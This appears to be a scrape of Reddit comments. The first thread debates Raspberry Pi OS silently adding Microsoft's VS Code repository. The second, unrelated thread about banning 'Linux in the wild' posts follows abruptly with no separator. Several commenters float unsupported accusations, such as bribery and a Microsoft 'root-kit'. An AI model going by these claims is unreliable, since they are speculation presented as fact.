I wanted to send you a message of a concern I had with Raspberry Pi OS. I have recently watched this video ([https://www.youtube.com/watch?v=TuYPIohzo2Y](https://www.youtube.com/watch?v=TuYPIohzo2Y)) and read this article ([https://hothardware.com/news/raspberry-pi-microsoft-repository-phones-home-added-pi-os](https://hothardware.com/news/raspberry-pi-microsoft-repository-phones-home-added-pi-os)) about how Raspberry Pi OS is now automatically installing a Microsoft Repository that is non-free, without the users consent, with a gpg key. This saddens me immensely. I love Raspberry Pi, I have been using Pis for at least 5 years, but this update really breaks my heart. This kind of behavior should have been a choice. Many users choose Linux devices because they want to get away from corporate greed and from privacy-invading monopolies like Microsoft and Apple. I am one of those users. By installing this without     notifying users, you have breached my trust with the foundation, to the point where I don't want to support the foundation anymore. I feel, it this is not reconciled, I may cease to be a customer and supporter of the foundation.  
   
>  
>Please, I beg you to reconsider this decision. Do the right thing to the FLOSS community and reverse the update and apologize. I don't want my telemetry going to Microsoft, this is the whole reason I use Linux computers in the first place.  
   
>  
>   I hope that you all will do the right thing  


Feel free to use it as a template and send them a message at [https://www.raspberrypi.org/contact/](https://www.raspberrypi.org/contact/)
Thread was shut down for "Microsoft bashing". Lmao you would think these people are new to the internet or something.
I guess it's time for Alpine Linux
For the people saying this isn't a big deal: would you be ok with a random PPA being installed that pings an NSA server everytime you update?
Once again, micro$$oft bullshit spills into the open source community.
Did any money exchange hands?
I would like to politely note that GitHub is also Microsoft, and that if you’re worried about Microsoft building a profile of you based on something as non-identifying as HTTP GETs to APT release-manifest URIs, you might first focus on the much-more-telling data you’re leaking by constantly cloning/syncing random GitHub repos — as the type of people in this subreddit are likely to do, whether for work or just when following the installation instructions of various half-baked hobbyist tooling.
Honestly, a quick notification that this happended and a way to disable it with the admin's knowledge would have been perfrctly acceptable.

Way to go Rasbian.
You can set your apt preferences to rank this repo's packages lower than the ones from your native distribution. Anyone who adds non-native repos like PPAs should be doing this anyways.
I run fedora on my pi's, and honestly it's been a great experience. Better than raspbian in a lot of ways. I imagine it's about on par with debian for raspi from a technical standpoint, but I prefer Fedora.
Well, I had not updated the system this week yet so this is the first notice of it. Seeing their "reasons" for shilling the MS nonfree version when the VSCodium team is doing an amazing job at providing us with some acutally clean builds with no licensing or closed source concerns I will be running away from Raspbian as fucking fast as I can and jump distro in mine to something else. Heck, not even Ubuntu  be  pulling out this kinda shit as far as I remember.
Well, there are many alternatives and the RPi OS in my world is NetBSD.
This Pi-tastrophe highlights a bigger issue... Raspberry Pi OS is good old boys club. Very few good Developers. No code review, no branches, no beta testing, just a few dudes who got together and decided to push Pi Pico. Two critical repositories made similar mistakes. At the end of the day, it is up to 2 overworked guys to figure out how to make everyone happy, while only working on the backbone of Raspberry Pi OS maybe 2 hours a week.

Let's be glad this is how we found out Pi OS should be avoided like Mt Gox and junk bonds. Take a brake, move on, publicaly love Microsoft stuff like... XBox controllers, or the Angry thought viruses fostered by PowerPC Apple commercials will resurface and people will take the defensive... Vitriol will only reinforce it.
Time for some RISCV love. No, but seriously , there are alternatives out there. I've had a bananapi running centos for like 8 years and it's never stopped working or let me down.
Now we know the reason for the name change.  Raspbian probably got wind of this and didn't want to be part of it.

In other news, [a new commit yesterday makes the installation of the vscode repo opt-in rather than opt-out](https://github.com/mikewwwperry/raspberrypi-sys-mods/commit/e13e4b4da2f06ca2173dd7e2d85f4a90578b4f0a).
Oh look, another reason to not use Raspbian/Raspberry Pi OS.
That's a huge breach of trust right here, as well as a privacy and a security issue. A package update should not modify sources.list.

It's also baffling how their CEO shrugs it off and forum posts get locked, showing that they see nothing wrong with it. What a bunch of clowns.

The proper way would be to maintain something like Debian's [`extrepo` package](https://packages.debian.org/buster-backports/extrepo) ([src](https://salsa.debian.org/extrepo-team/extrepo), [data](https://salsa.debian.org/extrepo-team/extrepo-data/-/tree/master)) which already has [`vscode`](https://salsa.debian.org/extrepo-team/extrepo-data/-/blob/master/repos/debian/vscode.yaml) (and yes, [`vscodium`](https://salsa.debian.org/extrepo-team/extrepo-data/-/blob/master/repos/debian/vscodium.yaml) too). That way, all the user wanting to add the vscode repo would have to do is `sudo apt install extrepo` and `sudo extrepo enable vscode`.

Never will I buy a Raspberry Pi ever again, and I will make sure my friends and people at work are aware of this issue too. Even though it's a software issue, I don't want to monetary support them by buying their hardware, and I also don't want to give them free advertising by running my projects on their hardware and then writing blog posts or having conversations about my project and mentioning how I'm running it on Raspberry Pi.
Making unauthorized modifications to existing configurations adding third party software distribution channels sounds like a horrible breach of trust from the Raspberry Pi Foundation. Silencing the community and claiming this is just bashing of a single company… Are they joking or what?

They made a big mistake. They should apologize and fix their processes. Not blame the critics.
Doing so without informing users is not cool but it is an easy fix.
Raspberry Pi Foundation team deletes (or doesn't publish) comments under blog post and topics on forum which they don't like.

Me and my friends noticed this many times.

They only allow writing what is consistent with the policy of their "party".
I’ve used Slackware-arm on the raspberry pi for a long time, it’s stable, open, easy to tinker with, I’ve never had any problems with it =)
Armbian exists soooo....
for some reason, this immediately reminded me of something...

https://www.tripwire.com/state-of-security/security-data-protection/freak-windows/
Not the first time. Won't be the last.
This is stupid idea, should be published way before this was done. The damage is irreparable.
Are you surprised?

I, for one, am not surprised one bit.

When you see the Microsoft infiltration and how some users and admins won't care about it, encourage using Microsoft garbage "but hey it works good", ignoring the risks, privacy and others, this was only a matter of time to happen.

Would not surprise me next if some Linux distros ship with powershell as default, Microsoft Edge as default browser, ...etc.
Sold out
Thanks for the heads-up. I already replaced the OS on my main RPis with Debian, now I have a very good reason to switch the rest to it as well.
Redmond got Root!
Damnit, the microsoft bloat infects everything.

The worst company i ever seen, they are not liked, but they force themselves in, WTF.

Next step:

"We replaced python with dotnet"
why would they push this to a headless machine? 

vscode is not something that can be used in the terminal. How does this help me?
I have created a pull request which will prompt the user with debconf if they are reviewing medium questions with a frontend. This gives a method of opting out interactively as well as preloading no thank you. Patch is here:

https://github.com/RPi-Distro/raspberrypi-sys-mods/pull/51

No word from package maintainer if the patch will be merged.
Everyone should switch to the OSS version of VS Code called Codium. Which is VS Code without the telemetry and branding. I've been using it for months now and it's 100% compatible (including extensions) with VS Code:

https://vscodium.com/

There is no reason to use VS Code with telemetry.

EDIT: To add, I forgot to mention that there are a few proprietary Microsoft extensions that do not work in Codium as of now (Remote Development being chief among them). So, if you need Remote Dev, use Code. Otherwise, you'll have an identical experience on Codium.
sudo chmod -w  /etc/apt/sources.list.d/vscode.list

If commented. Should screw up any attempts to change stuff - i hate microsoft

Might be time for me to move my pi's to debian dist.
[removed]
I don’t like this because I don’t like Microsoft’s business practices.
The effects of EEE
If they can - they will - no point standing on principle - weight the cost / benefits and do what you can to minimize.  This will always exist in online 'services' - the motivation will always be there and someone will always push the envelope. 

Take a stand on the larger issue of online privacy etc. if you want things to change.
Thanks for sharing this, man. This sucks! I guess I need to find an alternative distro :)
It seems like this has been resolved. On a rpi system which was imaged just two days ago, my /etc/apt/sources.list.d/vscode.list file reads as 

    ### Disabled by raspberrypi-sys-mods ###
WTF ???

What kind of garbage is this ?

Microsoft and their "friends" are absolutely disgusting!
Where did you get vanilla Debian? Also does it run on the pi 4? Also is there a 64bit image? I see no mention of 64bit on the Debian website for Raspberry Pis.
With a Pihole serving DNS on your LAN, you could just block _http._tcp.packages.microsoft.com, and packages.microsoft.com
If I don't do a 'sudo apt update', my system won't be affected?  It's already deployed and doesn't requires much maintenance.
Is there a way to continue getting Wolfram Alpha without getting the VSCode rubbish?
I hate it that microsoft has anything to do with the software i sometimes use(i own five different Pis). That said,  IF they have software that is open, then it should be no problem.  If it is just another "slick way" to get more user ad data then that is another story all together.  I gave up using windows almost 7 years ago now and i really really do not want windows BS in my beloved linux.
I suggest everyone to make an issue on [https://github.com/RPi-Distro/raspberrypi-sys-mods/issues](https://github.com/RPi-Distro/raspberrypi-sys-mods/issues)
WTF.  Thank you for bringing this up.
Okay, I can see what's going on. Can anyone give me some tutorial which system to choose and how to install it on ssd? I care about stability and support
I thought I was going crazy thinking I got drugged and didn't remember putting that repo in.
Did a bit of digging and it appears to have happened on the 31.1.2021 at 06:37 UTC+1 on my system. I run unattended upgrades which makes me think that this might be the time they rolled it out in europe. Also I looked at my installed packages and for some reason a lot of libmono packages are installed. I think they were on the install disk (from 17/11/2020) as no logs indicate otherwise.
Bad that they snuck it in there, but my main takeaway is.... I can use VSCode on my pi? Why the hell haven't I been using VSCode on my pi!?
Yep... they've just removed my comment about Microsoft... even though my comments are factual and can been proven about Microsoft... seems the moderators are not so transparent either.
It is quite easy. 

I dont trust Microsoft. 

Pi trust Microsoft.

=> I dont trust Pi.
This is a disaster for Raspberry Pi, (and really good for conspiracy theories.) Was [EbenUpton](https://twitter.com/EbenUpton) paid to insert a Microsoft root-kit into every Raspberry Pi? Is he just bored of maintaining and wants to burn raspbian to the ground?

Is this just incompetence? Did it not occur to him to ask the community, "Hey, I'm going to insert some Microsoft into your /etc/apt/sources.list.d/ do you mind? Oh and I'll insert a microsoft.gpg key so your operating system will just accept any evil they feel like pushing?"

I suspect that one of us *might* have objected.

Even if this is just a break in trust for rasbian, I can't see how it isn't going to splash back onto Raspberry Pi as well. Before this abuse I would always prefer a Raspberry Pi over one of the clones. Now I doubt that I will ever buy a Rasberry Pi again, (and I can't be the only person that will be advising against Rasberry Pi in the future.) \[Which is just another conspiracy theory portal: did /r/wallstreetbets put Eben up to this as part of a short against Broadcom? So many options for silly stories to console those of us that have to spend the weekend migrating entire infrastructure off raspbian, ready before first class on Monday.\]
We are taking the consequence and leaving the Raspberry platform.
Dishonest, very corporate, sigh
Completely unrelated that question. Why do you hate Microsoft in 2021? Sure patent lawsuits and puppy comments and antisocial behavior left a bad taste... Today my pet peeve is Azure and their business of giving Enterprise tools only to Enterprise for a hefty premium. Enterprise ERP and standardized integrations are something everyone should have. SAML and webhooks are God sends... But Microsoft has perverse incentives to stifle standardization and the publishing of free solutions. Apache killed IIS. They really, really don't want to see that happen to Windows, Office and Word Online. I think that's antisocial, but I also think it's not their job to make that happen... It's on us, but they should also not be allowed to stop it.
Just read this.
I was one click away from buying a raspberry Pi, but now it seems like we lost them to microsoft :/. Is there a good alternative?
Wow... and I am in the process of installing the OS on my first pi when I saw this...I switched to linux from windows in part because of this kind of thing.
How on earth they think that this would go unnoticed by Linux users? My Linux knowledge is very very limited so how can they try this on the first place when every piece of OS code including kernel is open source?  Can someone kindly explain please?
Yeah I always felt wierd about raspberrry os, glad i don't use it. This is disgusting
Glad I've gotten used to running Arch Linux ARM. My router is a Pi 4, and I sure wouldn't want shenanigans like this going on.
> This can potentially lead to a scenario where an update pulls a dependency from Microsoft’s repo

That's unlikely if the Foundation themselves installed the repo. Also, 3rd party repos *rarely* have other dependency code due to the obvious problems it causes (especially for the devs, who will find themselves inundated with bug reports.) 3rd party repo dependency issues are theoretically possible but extremely unlikely.

> I switched all my Pi’s to vanilla Debian

Yep, if you don't like it, don't use it, but there's no practical reason to be concerned.
I am sure I will get bashed for this but let's put some context into play...

1) You are running an OS provided by a 3rd party, them removing / adding repo's is absolutely not out of the ordinary. This is not an enterprise OS or a paid OS (you pay for the hardware not the OS) where something like this would seem out of place.

2) "without the administrator’s knowledge" - This is complete BS. It was listed in the package updates, just because you ignored what it said / set it to auto update does not mean that they did it in a backhanded hidden way... it means that you chose to ignore what you were approving and then got mad when you approved something you did not want.

3) They also install Microsoft’s GPG key used to sign packages from that repository - Yes this is how it works...

4) That package would be automatically trusted by the system. - ALL installed packages are trusted by the system.

5) Every time you do “apt update” on your Pi you are pinging a Microsoft server. - Everytime you download something from github you are downloading from a MS server. There are tons of MS servers that host CDN content (js requests anyone)

The fact that a fairly small OS that is geared towards hobbyists is making things easier on their users and themselves by taking a support offering from a corporation does not qualify as a big deal.

Anybody in here that thinks they are able to hide from any major corp or govt doesn't understand the reality of how the internet works. There are maybe a small handful of people in the world that could truly anonymize themselves both in knowledge and actual discipline to follow through with what it would take to do it, to a point where they could hide for any length of time. Everyone else in reality is being tracked, the reality of the matter is that no one really cares who you are or what you do until you do something stupid enough for you to get arrested.
I was positively surprised when I installed Alpine Linux to my raspi server. It's awesome and the ability to rollback is really nice (rootfs is "commit" based. Essentially stacks overlayfs/squashfs on top of eachother) although that's a bit of extra complexity for uninitiated users.
This thread is hilarious. Thanks!
Nope! No, no, no, no, no, no! Nope!!
Oh, cool!A microsoft spyware.
Looks like MS is trying so hard to dip their fingers into the open-source world, too, to collect some data. As if the rest of the world isn't enough already.
That’s really bad. I’m a Linux user for a long time and i hate Microsoft with all my powers, so adding Microsoft to my sources list without my knowledge is a betrayal! I will continue using the raspberry pi bur, i will never use Raspbian again.
raspbian is shit. it's the first thing I don't install.
I’d just like to interject for a moment. What you’re referring to as Windows, is in fact, NSA/Windows, or as i have taken to calling it, NSA plus Windows. Windows is not an operating system unto itself, but rather a non-free component of a fully functioning NSA system.

Many computer users run a modified version of the NSA system every day, without realizing it. Through a peculiar turn of events, the version of NSA which is widely used today is often called “Windows”, and many of its users are not aware that it is basically the NSA system, developed by the PRISM Project. There really is a Windows, and these people are using it, but it is just a part of the system they use.

Windows is the kernel: the program in the system that allocates the machine’s resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Windows is normally used in combination with the NSA operating system: the whole system is basically NSA with Windows added, or NSA/Windows. All the so-called “Windows” versions are really versions of NSA/Windows.
It's an officially supported repo for their officially supported distribution. If you don't like it, use another distribution, but for people who want to stick to what's officially supported, it's nice to see them expanding their options.
This seems like a huge over reaction to adding an optional repository. No packages will be "automatically trusted", that's not how APT works. You'd have to specifically opt into installing a package from their repo to get a package from them.

Also, why install an entirely different OS? Just comment out the repository if you don't want it. This is literally a ten second fix if you don't want to risk getting updates from a Microsoft repo.

Raspberry Pi is just making it easy to install the MS coding tools, a big draw for many people who buy Pis, since it's primarily a development board.
MSFT is the DEVIL!
Thanks for the warning!😤😠😡🤬
This merits a CVE, GDPR lawsuits, License lawsuits under GPL, CCPA investigations, Anti-trust probes... UK SBC's are a threat to national security... Import ban?

[https://gitlab.com/FossPrime/raspberrypi-antitrust](https://gitlab.com/FossPrime/raspberrypi-antitrust)
Completely unacceptable.
Looks like someone got a cash infusion from Microsoft. The rest of you lusers better like it and shut the fuck up or take that ban hammer. 

Just be glad we haven't rolled out any telemetry in the packages yet. Our developers need that data to make your "experience" better.
I started a playbook to collect ideas on bringing them to justice... please send PR's  
Gitlab: [https://gitlab.com/FossPrime/raspberrypi-antitrust](https://gitlab.com/FossPrime/raspberrypi-antitrust)  
Mirror: [https://github.com/rayfoss/RaspberryPi-AntiTrust](https://github.com/rayfoss/RaspberryPi-AntiTrust)
Fifteen years ago I would have written this off as paranoia. But after Windows 10, and the means that were used to deploy it, I don't want Microsoft coming anywhere near my computer.
Who are the RPI foundation, and what is different about raspbian from Debian?
On Windows, a recent update forced Microsoft Edge onto the desktop.

How long before Edge is the mandatory default browser on Raspian?

By default my windows compuers at home have no default gateway. They have no access to the internet, and they are much faster and more stable as a result.
I find this deeply offensive. My server has been violated. My relationship with Raspbian ends here.
[deleted]
So what?  GitHub servers are Microsoft servers too
So... we are gonna criticize Raspian for including the repo to install VS Code, yet Pop!_OS has always had it and no one cares? I get tired of the outrage mobs that form after changes are made that make a distro easier to use. The fact you can even run VS Code on an RPi is honestly amazing! If you don’t like it, disable the repo... and stop being outraged.
Wow damn, I have a few RPis I had earmarked for an upcoming project. Time to sell them and just build a small custom machine instead.
*They had us in the first half not gonna lie*
It seems to be a new strategy from Microsoft. I got their  MSTeams installed on my office ubuntu. It is a malware. And now this. I have been very much pro Raspberry, they are now dead. I have canceled my order of pico's. I dont use tools that are in any way related to Microsoft. If raspberrian does anything with microsoft that is not opt-in they not part of my system. And their attitude against people arguing about it, make it reasonable that Microsoft has bought their loyalty. No more PI hardware for me.
Thanks a lot for the heads up, this Friday I was going to reinstall raspbian on my pi (did dumb things to the os and it doesn't boot anymore lol), now ill put manjaro on it just as I did with my other pi.
Wow that's definitely bad.  It should be opt in only.
I find these posts exceedingly boring. A university runs Debian. A science lab uses Scientific Linux. An advertising board or inflight entertainment system runs Linux too. None of these things are surprising or interesting, and in my opinion they just clutter up the subreddit.

Edit: this post got a bit more attention than I expected - thanks for all your comments, I've enjoyed seeing the different perspectives on the issue.
[deleted]
I would agree if they really cluttered up the sub, but I just can't see the high number and big disturbance.
I checked the r/LinuxInTheWild subreddit and it appears to be private.

Edit: Forgot to add that removing these posts would make this sub a lot smoother. I like those posts myself but I think they should be in their own dedicated sub.
At least require a description in the title. "Look what I found" is getting annoying.
+1, also those "look what I found on my X, it's Y installation disc".
[deleted]
I've sorted r/linux by new and counted until I got bored: out of the most recent 115 posts, 7 were Linux in the wild (all but one with a decent number, more than 200, of upvotes). I kept scrolling counting posts marked as LITW and with low-informative images of screens. For the last 30 days there were some 17 posts like that.

&#x200B;

Please, don't waste 'bans' on problems that amount to 17 swipes per month.
[deleted]
Nice try MICROSOFT!!
Does it really matter? If you aren't interested, just ignore the content. 

Sometimes it's cool to see where linux is used
I agree. It's usually just pointless fluff.
I would have to vote no on a ban.  This is a Linux forum and "in the wild" showing Linux distros can be interesting.  Most no so much.  But when I  was new to  Linux and saw the penguin on an inflight system I was giddy and wanted to enthusiastically learn more.  I didn't post it here because I'm not that guy.  I think if we start banning them the Linux community will be viewed as a bunch of pretentious assholes.  It's easy to scroll passed them, vote them up, vote them down, whatever, just don't turn them off of the community. 
Please do ban them. There are billions of devices running Linux; a large percentage of people carry them in their pockets. Even desktop distros like Ubuntu are pretty ubiquitous in digital signage.

They should be allowed if there is some kind of technical content; someone managed to get a shell on a Linux device in the wild, or someone found a Linux system embedded in a Windows tablet or something.

But anything that is just a photo of a sign in an airport rebooting should be banned. For some reason people upvote them, but they add nothing to the sub.
No on bans, Just enforce flairs, if you don't like a post just scroll it away and/or downvote it, simple.
While the subreddit isn't saturated with them (and thus it isn't a huge deal), I do view this sub as a Linux news / Linux-related news sub, so I support the ban.

At the same time, I've enjoyed the occasional fluff (like the Linux cake that was top all-time for a while), and I think standardizing and enforcing flaired posts is a better solution right now.
What if we had a subreddit just for "Linux in the wild" posts? Or does one already exist?
I hate them; I do not support a ban.

I support a flair that you can filter out at your own pleasure
Agreed, we already know a lot of things run Linux.
I find the 'Linux in the wild' posts to be clutter posts on this sub, much like people showing pictures of their desktop.

Browsing /r/linux would be more enjoyable if there was less congestion from these posts IMO.
Seeing the same pictures of Linux booting on a delta plane, or wherever else, over and over can be a bit annoying, yes. I do think that it's still appropriate for here, however. As a place for discussing the world of Linux, trends, news, etc it does fall in to the category of news. No, it's not interesting anymore, and does get annoying. 

I don't know if a ban is appropriate. And I know that if a ban is in place, it needs to be followed. But realistically, the people that post these pictures over and over ad nauseum, they haven't been around long enough to know that the same picture was recently posted, so will they realistically read the sidebar and know that they shouldn't post it? That being said, maybe they post it once and get told they can't post it, maybe it would reduce repeat offenders, but I'm not sure that it would decrease first-time offenders
Remember when it was exciting to find Linux running in the wild?

Pepperidge Farms remembers. 
The sub is 50% praising a crashed linux system and 50% faulting a crashed windows system
How about you just downvote them? Policing boring content with bans is lame.
No I like them
No, I love those posts, they brighten my day.
I mean the whole excitement of finding something running Linux in 1999 was really cool to see. Everything runs Linux now so I don't get it. 

It just seems silly at this point. Linux is everywhere so why are we acting surprised when something runs it? The novelty has run out.

It's everywhere, the smartphone in your pocket likely runs it. Billions of devices, servers and computers running it but our community treats it like some novelty to see it in the wild.

This community is constantly reminding everyone that Linux powers everything but at the same time we find it newsworthy when a kiosk at the mall crashes running Linux...

Which is it? It's either the most used OS in the world OR it's newsworthy to see someone running it in the wild.

It really can't be both.

I'm not even really against the posts but to me it just seems childish. We live in a time where you can safely and honestly say Linux is the most used operating system in the world. But at the same time we have people in the community that seem genuinely surprised to see it in the wild? Wtf??

Just try imagining a Windows sub with people posting shit like "look guys my local Kmart runs Windows 7". That would be pretty ridiculous. So why are we doing it? 

Definitely not a huge issue by any means but IMO it's one of those things this community really needs to grow up and move away from.
Why should there be a ban? I don't find them boring and they are not that frequent any way, and I am sure many others would agree with this. This whole ban thing is ridiculous, just as long as something is not overly offensive and does not break the general accepted standards for this sub, and can potentially add something positive to the Linux community, people should be allowed to post what they want.
Would /r/itsaunixsystem be more appropriate? 
I don’t like them but I’m against censorship. Just downvote and move on. 
Just down vote it and move on?  Seems like an odd thing to censor. 
I enthusiastically support your suggestion!
If you find it boring, then downvote it or ignore it. It's not a big deal.
[deleted]
All the fluff needs to go.
just use RES and filter them out. that way everyone is happy.
If there were a ton of significantly better posts being buried under a mountain of them sure. Until that day happens, they're no more or less obnoxious than half the posts around here including ones like this with trivial complaints.
I do not disagree, but having that information out there is letting people know that there are other OSes out there.  I see your point though.

&#x200B;
Ok. I have no strong feelings either way, but that's just because this is a Reddit sub that takes the name linux, which is pretty broad for potential content. Maybe an alternative would be to start a new sub for whatever Linux related content you think is acceptable? Dunno if /r/Linuxnews or something is already taken but I'm just saying, when I came to this sub I figured it was all things Linux.

Also how does it clutter? Just not seeing any issues with this at all that need to be addressed through banning Content. 

Could also implement a post tag policy and people like you, who find it frustrating to see pictures of people posting pictures celebrating finding Linux being used somewhere, can simply filter by tag. 
Won’t downvote the question but my answer is “no”.  As a fairly seasoned Linux user, I appreciate them for a variety of reasons 
1) It provides me with a reminder that other distros exist, and perhaps helps glen understanding as to why it may be used in certain scenarios. I’ve honestly still never ran Debian on a server, Maybe I should after I see this big research project does, etc. (I’ve actually kinda wanted to after I saw LIGO does).

2) For the weirder ones, an appreciation either for a new use case, or the absurdity, or just that it got market share.   The fridge runs Ubuntu? Or the Kiosk at the Drug store, etc etc.

If there are too many, or are redundant, or obvious, sure. But I always enjoy a quick one.
I couldn't care less about those posts. Just like the 'look, I found this Redhat 5 disc under a pile of crap in my room' posts.  
But a ban might be a bit much. Discouraging them and deleting the posts would be a nice start.
No I don't. I really do want to constantly be reminded that Linux is everywhere even if proprietary software companies don't want us to know.

>A science lab uses Scientific Linux. An advertising board or inflight entertainment system runs Linux too. None of these things are surprising or interesting, and in my opinion they just clutter up the subreddit.

I am interested in the software and configuration your lab is using, but the only thing published in relation to that in the academic articles in relation to that in IEEE spectrum is a rephrasing of already existing documentation. I guess none of us can be happy.
I also disagree with this post. If people want to posts pictures of machines running linux how does this take away from your life in any meaningful way? You are just being pedantic and rude. 
Yeah, it's not like it's some kind of rare animal...
I would not support such a ban. You do know that not opening them is an option ?
How about we ban posts that propose banning the free exchange of information and ideas, even those we disagree with.

This is why reddit has a down-vote button.
IMHO it would be far more important to ban "What distro should I start with?" or "What distro should I use for <usecase XY>".
Linux is more common than Windows by far. So yeah, it ends up everywhere that isn't a "desktop".

Its on cars, airplanes, signage, portals, and plenty more. Unsurprising, and it's boring at that. 
I would support a ban on whatever kind of post this is
I get your point, but on the other hand....just skip them if it bothers you so much. 
No thanks.  I like those posts, since they're a reminder that Linux is everywhere, even if you can't always see it.
I personally think it might be time to enforce flairs.
It is the most common operating system on the planet.  Seeing it in public is not noteworthy.
Perspective from a non-Linux enthusiast (yet), maker, and budding (still in school) software/computer engineer:  I find them interesting and I come to the sub from the front page for comments because of things like this.

These kinds of posts are interesting to me because you (I?) never realize just how much of our world is run on open-source software or microcomputers like Raspberry Pi until you see posts like these.

It's your call, of course, but I'd posit that it's a way to generate interest among those, like me, who aren't full blown Linux folks but who play around with this stuff occasionally and are curious about the tech world around them, or are interested in security or device administration and are interested to see how things go wrong in the wild, and hence, what to watch for when learning/building.
I don't see the problem. You don't like a post, you keep scrolling. 
deleted  ^^^^^^^^^^^^^^^^0.9041  [^^^What ^^^is ^^^this?](https://pastebin.com/FcrFs94k/47603)
Why though?  Some of us find it neat that Linux exists in places you wouldn't expect it to.  

Nope, I do not support banning it. You don't have to read every single thing that gets posted here - let the voting system sort it out. I only read the top or 'best of' content and I don't really see that many "in the wild" posts, so it's a non-issue. I also don't see how it's "cluttering up" the subreddit - this is a general purpose, community oriented sub and as such, it is cluttered by definition. If you're interested in more specific/technical content, then there are technical/specific subs for such content already (and plenty of other forums, mailing lists etc).

And personally, I love seeing Linux in the wild. Especially where I live, it's a Microsoft shop and it can be incredibly frustrating at times. Seeing more instances of Linux in the wild gives me a bit of hope and it brightens my day.
Yes, please. Those are so incredibly annoying.

Linux in the wild was a novelty in 1999, but not in 2019. The majority of embedded devices run Linux these days, so posting a “Linux in the wild” photo of a ticket vending machine with a kernel panic is anything but interesting.

Also, I don’t want to see your RedHat Linux CDs from the 90ies either. There is no value in posting these, I have these boxes standing in my bookshelf myself, so I don’t need to see them on a Linux forum.

Just make a separate subreddit for these posts and everyone is happy. There is no need to pollute the main Linux subreddit with these posts.

Thanks for this post, OP!
Sorry... Bring on the down votes. But I like these posts. It's a sense of community. Some railway station in eastern Europe runs Ubuntu? Ye! So do I! 

It's a small celebration of all of us doing something extremely different in the world. We are not sticking to the norm and therefore deserve a notice somewhere. And it makes me feel that I am not the only crazy in town. There are others like me. 

If all of the mature/advanced Linux users feel they don't need to see the post, down vote it. But I will give it my one up vote when I can. 
> I find these posts exceedingly boring.

Don't read / look at them then? 

I don't wander into a library and complain about the romance section because i don't like romance...
As an old fart that was running linux on my 386sx in uni there was once a time when seeing linux in the wild was a special and heartwarming deal. That time has passed. Leave in the creaking recesses of slashdot.
I'd be pretty much interested in the things like at LIGO and NASA, but even then they only need be posted once - then something more than "hey look one console's running debian with the default wallpaper."
The main problem is that people upvotes it. In other words, people likes that kind of content.
up vote for attention. I'm against the proposal.  Such posts are not offensive or particularly abusive.  I'd support tagging them as fluff.  Or just down vote them if you want and let the algorithm do the work.
Yes.  In fact I'd welcome the posts rudely shuttled off to the condescendingly named linux4noobs as a substitute.
Yes
I don’t mind them. Not everyone here is ascended to fully initiated in all things Linux so it’s nice to see what all sorts of things Linux is found running. 


Someone is upvoting them...  If you don't like them, don't look at them?  Downvote and move on?  Why does the moderator have to cater to your preferences?

For the record, I agree they are low effort and generally uninteresting, but I don't think they need to be banned.
No
I don't get people who say this. If someone is new to linux, and sees ubuntu/debian/whatever in the wild it's normal for him/she to be excited about it, there's no need to go down hard on those posts, if you don't like them downvote or scroll past. Banning is excessive.

Edit: What's really annoying is distro suggestions. Those should be banned and moved to r/findmeadistro (
We could let the up votes decide what people want. And if you don't like the posts the majority up vote, use the flair system (assuming the subreddit uses flairs).

Banning posts because a few people think they don't like them is soo anti-reddit.
No.  I find them inspiring.
Stop asking for bans acting like this sub is full of something when its rather rare.

People who want to ban them, make a group or something and start tracking these posts. Show us the data how many posts of that kind were submitted per month and how how many upvotes/downvotes they got on average.

Do the work if you truly believe in the cause.

Stop just asking for ban like its needed.

FFS most of the submissions in /r/linux are not interesting to me, stop acting entitled.
I wholeheartedly agree. There should be a subreddit just for that.
Personally no. You can ignore/ hide/ downvote the post, but banning them seems way too far.
Downvotes exist for a reason. As do RES filters. I don't like 'em either, but the fact that they show up so frequently and get upvoted means that others do.

You are not your brother's keeper here.
agreed, unless it's something truly interesting. or ironic, like a sign in a Microsoft store
Yep, they were really cool 20 years ago.  Now I feel like it's just illustrating how clueless some people are about how widespread Linux is in the world.
I really don't care about random restaurants and airports using Linux on screens and kiosks or other plug-and-play digital devices in businesses, since that is so common.  

If you've got a picture of Linux running on a Gameboy or something, that is a bit more interesting, but also a pretty low-quality post, unless you're the one who installed it and also provide a guide of the steps you used to get it to work. 
It would be more interesting if Linux was that niche system nobody uses, but I can't even remember last time I saw anything else running such displays. I think it's all Linux all the time these days. Linux isn't rare at all in the embedded world.
Why
>Would anyone else support a ban on 'Linux in the wild' posts?

#YES.
Why are you banning stuff - just skip over it if you don't like it. I think we should ban people that want to ban stuff.
Even though I personally find these threads boring and annoying, I find that the threads are "on topic" in /r/linux. So why ban it? 
I don't care for them, but I appreciate them. Most of the people who post this stuff are either new to Linux our new to the sub, and I think it's good to be nice to newcomers.

Besides, this is what the Reddit voting system is for, anyway.
"I find it boring, therefore it should be banned."   

No.  

No, I enjoy seeing glimpses of linux outside of my desk.
I disagree with the ban. 

Clutter is not a measurement. I understand they make you feel bad, but that's a personal problem that you should investigate yourself. 
I'm ok with them.  Most of them I do just overlook, but I think the noise is worth it for the occasional post that is really interesting
I just downvote and move on... 
/u/Spez quarantined The_Donald to silence Trump supporters. VOTE TRUMP/PENCE IN 2020! MAGA/KAG!
No.
Do it. "wow guys look at this web server that runs Ubuntu" 
'A redditor uses Ubuntu to post on Reddit'
I like it
I'm fine with it when it's something different like a parking lot pay machine. Completely pointless if it's just a desktop computer you found at your college.
I don't think they happen often enough to warrant a problem. And if they were a problem, the better solution is to make a thread specifically for them, and then sticky it.
I find it interesting.
i suppose u too sort by new
Imagine you were new to Linux and saw all these things you use every day that are powered by linux and didn't know. Wouldn't that be cool for you. I understand most people on here know most things have Linux underpinnings but for the less savvy people who stumble across this Reddit it might be appreciated. That's just my 2 cents. 
Doesn't bother me 
I have seen some Windows blue screen and a few Linux but up screen in the wild. It can be concluded that Linux are much more stable than windows
I like them. I got excited when I was flying Singapore airlines and they had to reboot the inflight entertainment system and I realized that they were running redhat.

It is good for the growth of Linux that people who are new both can get excited about seeing it "In the wild" and have the social proof that large scale enterprises use it. So when some Newby's mate says "why are you using that shit" the Newby can say "well it is good enough for... To run their...

You do want more Linux users in the world don't you? 
This happened to another subreddit I frequent.  The reason there is because it has all be talked about.  It has all been said.  Now they only try to reassure themselves that they're normal.
I'll be honest, they were, cool for me 10 years ago when I was just starting out and had no idea it was running everywhere.  Now, not so much, probably like most of us, I get that probably a majority of systems out there are running Linux.

I like them here because I think they are a real eye opener when you walk into the open source world and realize that anything big is running Linux.  I do wonder if we should do a weekly mega thread where all top level comments are runs Linux.
